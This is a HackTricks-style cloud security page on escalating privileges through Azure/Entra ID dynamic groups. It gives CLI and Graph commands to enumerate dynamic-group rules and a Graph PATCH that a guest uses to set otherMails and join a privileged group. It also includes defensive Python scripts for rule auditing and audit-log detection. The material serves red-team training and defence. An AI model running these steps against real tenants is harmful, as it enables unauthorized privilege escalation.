Az - Dynamic Groups Privesc
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Dynamic groups are groups with a configured set of rules; every user or device that satisfies those rules is automatically added to the group. Whenever a user's or device's attributes change, the dynamic rules are re-evaluated, and whenever a new rule is created all users and devices are evaluated against it.
Dynamic groups can have Azure RBAC roles assigned to them, but it is not possible to assign Azure AD roles to dynamic groups.
This feature requires an Azure AD Premium P1 license.
Privesc
Note that by default any user can invite guests into Azure AD, so if a dynamic group rule grants users permissions based on attributes that can be set on a newly invited guest, it is possible to create a guest with those attributes and escalate privileges. A guest can also manage their own profile and change those attributes themselves.
Find groups that allow dynamic membership:
```bash
az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table
```
Dynamic Groups Enumeration
Get the dynamic group rules:
With Azure CLI:
```bash
az ad group list \
--filter "groupTypes/any(c:c eq 'DynamicMembership')" \
--query "[].{displayName:displayName, rule:membershipRule}" \
-o table
```
With PowerShell and the Microsoft Graph SDK:
```powershell
Install-Module Microsoft.Graph -Scope CurrentUser -Force
Import-Module Microsoft.Graph
Connect-MgGraph -Scopes "Group.Read.All"
Get-MgGroup -Filter "groupTypes/any(c:c eq 'DynamicMembership')" `
-Property Id, DisplayName, GroupTypes
# Get the rules of a specific group
$g = Get-MgGroup -Filter "displayName eq '<GROUP NAME>'" `
-Property DisplayName, GroupTypes, MembershipRule, MembershipRuleProcessingState
$g | Select-Object DisplayName, GroupTypes, MembershipRule
# Get the rules of all dynamic groups
Get-MgGroup -Filter "groupTypes/any(c:c eq 'DynamicMembership')" `
-Property DisplayName, MembershipRule |
Select-Object DisplayName, MembershipRule
```
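Once the rules have been enumerated, the defender's question from the Privesc section above is which of them depend on attributes a guest can set on their own object. The following script is an added example (not HackTricks' or Microsoft's code) that reads the JSON form of the `az ad group list --query "[].{displayName:displayName, rule:membershipRule}" -o json` output and flags rules referencing such attributes. The `SELF_EDITABLE` set is an assumption: the page only demonstrates `otherMails`, so tune the list to your tenant's self-service profile settings. The sample groups are constructed.

```python
"""
Flag Entra ID dynamic-group rules that key on attributes a guest can set on
their own profile. Added example; not HackTricks' or Microsoft's code.
Input shape assumed to match:
  az ad group list --filter "groupTypes/any(c:c eq 'DynamicMembership')" \
      --query "[].{displayName:displayName, rule:membershipRule}" -o json
"""
import json
import re

# Attributes a guest is ASSUMED able to set on their own object via Graph.
# otherMails is the one the page demonstrates; the rest are assumptions to
# tune against the tenant's "users can edit their own profile" settings.
SELF_EDITABLE = {"otherMails", "displayName", "mobilePhone", "businessPhones"}

# Matches property references such as user.otherMails or device.displayName
PROP_RE = re.compile(r"\b(user|device)\.([A-Za-z0-9_]+)")


def referenced_properties(rule):
    """Return the set of 'user.x' / 'device.x' references in a membership rule."""
    return {f"{obj}.{prop}" for obj, prop in PROP_RE.findall(rule or "")}


def targets_guests(rule):
    """True if the rule explicitly scopes to guest users (user.userType -eq "guest")."""
    return re.search(r'user\.userType\s+-eq\s+"guest"', rule or "", re.I) is not None


def assess(group):
    """Classify one group by the self-editable user attributes its rule depends on."""
    props = referenced_properties(group.get("rule"))
    risky = sorted(
        p.split(".", 1)[1]
        for p in props
        if p.startswith("user.") and p.split(".", 1)[1] in SELF_EDITABLE
    )
    return {
        "displayName": group.get("displayName"),
        "risky_attributes": risky,
        "guest_scoped": targets_guests(group.get("rule")),
        "risk": "high" if risky else "low",
    }


def assess_all(az_json):
    """Assess every group in the JSON document produced by az ad group list."""
    return [assess(g) for g in json.loads(az_json)]


# Constructed sample output standing in for a real az ad group list call
SAMPLE = json.dumps([
    {"displayName": "SecOps-Contractors",
     "rule": '(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")'},
    {"displayName": "Finance-Devices",
     "rule": '(device.deviceOSType -eq "Windows") -and (device.deviceOwnership -eq "Company")'},
    {"displayName": "All-Employees",
     "rule": '(user.userType -eq "Member") -and (user.accountEnabled -eq true)'},
])

if __name__ == "__main__":
    for result in assess_all(SAMPLE):
        print(result)
```

Feed it real output with `az ad group list ... -o json > groups.json` and `assess_all(open("groups.json").read())`; any group reported as `high` should have its rule rewritten to key on attributes only an administrator can set (for example a verified `department` or an extension attribute populated by HR sync), or its Azure RBAC assignments reviewed.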
Example
- Example rule: (user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")
- Rule description: any guest user whose secondary email address contains 'security' will be added to the group.
Using the guest user's email address, accept the invitation and check that user's current settings at https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView.
Unfortunately the portal page does not allow changing the attribute values, so the API has to be used instead:
```bash
# Login with the guest user
az login --allow-no-subscriptions
# Get user object ID
az ad signed-in-user show
# Update otherMails
az rest --method PATCH \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--headers 'Content-Type=application/json' \
--body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}'
# Verify the update
az rest --method GET \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--query "otherMails"
```
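The PATCH above leaves a trace: an "Update user" entry in the Entra ID audit log where the initiator and the target are the same guest object, followed shortly by the dynamic-membership engine adding that user to a group. The script below is an added detection example (not HackTricks' code) that correlates those two events. The records follow the general shape of Entra `directoryAudit` entries (`activityDisplayName`, `initiatedBy`, `targetResources[].modifiedProperties`), but the sample events, the initiating app name and the `OtherMails` property spelling are constructed assumptions to check against your own exported logs.

```python
"""
Correlate a self-service otherMails change with a subsequent group add,
over records shaped like Entra ID directoryAudit entries (shape assumed;
sample records are constructed). Added example, not HackTricks' code.
"""
from datetime import datetime, timedelta

# Property names (as they appear in modifiedProperties) that warrant an alert
# when the subject edits them on their own object. "OtherMails" follows the
# page's example; its exact display-name spelling in the log is an assumption.
WATCHED_PROPERTIES = {"OtherMails"}
CORRELATION_WINDOW = timedelta(hours=1)


def _ts(s):
    """Parse an ISO-8601 timestamp with a trailing Z."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def self_service_updates(events):
    """Return (time, user_id, props) for 'Update user' events where initiator == target."""
    hits = []
    for e in events:
        if e.get("activityDisplayName") != "Update user":
            continue
        actor = (e.get("initiatedBy") or {}).get("user") or {}
        targets = e.get("targetResources") or []
        if not targets or actor.get("id") != targets[0].get("id"):
            continue  # edited by someone else (e.g. an admin): not self-service
        changed = {p["displayName"] for p in targets[0].get("modifiedProperties", [])}
        watched = sorted(changed & WATCHED_PROPERTIES)
        if watched:
            hits.append((_ts(e["activityDateTime"]), actor["id"], watched))
    return hits


def group_adds(events):
    """Return (time, user_id, group_name) for 'Add member to group' events."""
    out = []
    for e in events:
        if e.get("activityDisplayName") != "Add member to group":
            continue
        targets = e.get("targetResources") or []
        user = next((t for t in targets if t.get("type") == "User"), None)
        group = next((t for t in targets if t.get("type") == "Group"), None)
        if user and group:
            out.append((_ts(e["activityDateTime"]), user["id"], group.get("displayName")))
    return out


def correlate(events):
    """Pair each watched self-edit with group additions for the same user inside the window."""
    adds = group_adds(events)
    alerts = []
    for when, uid, props in self_service_updates(events):
        joined = [g for t, u, g in adds if u == uid and when <= t <= when + CORRELATION_WINDOW]
        alerts.append({"user": uid, "changed": props, "groups_joined": joined,
                       "severity": "high" if joined else "medium"})
    return alerts


# Constructed sample audit records (not real tenant data)
GUEST = "11111111-1111-1111-1111-111111111111"
ADMIN = "33333333-3333-3333-3333-333333333333"
SAMPLE_EVENTS = [
    {"activityDateTime": "2024-05-01T10:00:00Z", "activityDisplayName": "Update user",
     "initiatedBy": {"user": {"id": GUEST,
                              "userPrincipalName": "guest_example.com#EXT#@contoso.onmicrosoft.com"}},
     "targetResources": [{"id": GUEST, "type": "User",
                          "modifiedProperties": [{"displayName": "OtherMails", "oldValue": "[]",
                                                  "newValue": '["security@example.com"]'}]}]},
    {"activityDateTime": "2024-05-01T10:07:00Z", "activityDisplayName": "Add member to group",
     "initiatedBy": {"app": {"displayName": "Dynamic membership service (assumed name)"}},
     "targetResources": [{"id": GUEST, "type": "User"},
                         {"id": "22222222-2222-2222-2222-222222222222", "type": "Group",
                          "displayName": "SecOps-Contractors"}]},
    {"activityDateTime": "2024-05-01T11:00:00Z", "activityDisplayName": "Update user",
     "initiatedBy": {"user": {"id": ADMIN, "userPrincipalName": "admin@contoso.onmicrosoft.com"}},
     "targetResources": [{"id": GUEST, "type": "User",
                          "modifiedProperties": [{"displayName": "JobTitle", "oldValue": "",
                                                  "newValue": '"Contractor"'}]}]},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

A `high` alert means a user changed a watched attribute on their own object and was added to a group within the window; the admin-initiated update in the third sample record is deliberately ignored because the initiator differs from the target. Beyond detection, the mitigation is to stop rules from keying on self-maintained attributes, restrict who may invite guests, and review which self-service profile edits guests are allowed.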